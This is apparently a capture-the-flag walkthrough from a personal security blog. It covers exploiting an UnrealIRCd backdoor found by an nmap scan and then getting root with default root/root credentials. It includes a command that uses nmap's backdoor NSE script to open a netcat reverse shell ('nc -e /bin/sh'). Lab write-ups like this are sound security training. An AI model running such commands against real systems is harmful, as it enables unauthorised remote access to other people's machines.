Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub


We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Tue Apr 27 15:21:07 2021 as: nmap -sC -sV -oA nmap
Nmap scan report for
Host is up (0.22s latency).
Not shown: 999 closed ports
6667/tcp open  irc     UnrealIRCd
Service Info: Host:

Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Apr 27 15:22:06 2021 -- 1 IP address (1 host up) scanned in 59.09 seconds

Just a IRC port cool doing some research on it i found out we have some popular irc-unrealircd-backdoor NSE script on Nmap so i give it a shot.

The irc-unrealircd-backdoor.command script argument can be used to run an arbitrary command on the remote system. Because of the nature of this vulnerability (the output is never returned) we have no way of getting the output of the command. It can, however, be used to start a netcat listener as demonstrated here

nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 1337'

Now before running the backdoor NSE script we need to start and Ncat listener on our machine.


Now let hit the NSE script.


And we have shell.


Privilege Escalation

Took me time because the machine was so clean but using root and root for both username and password drop us into the root shell.


Greeting From Muzec

Back To Home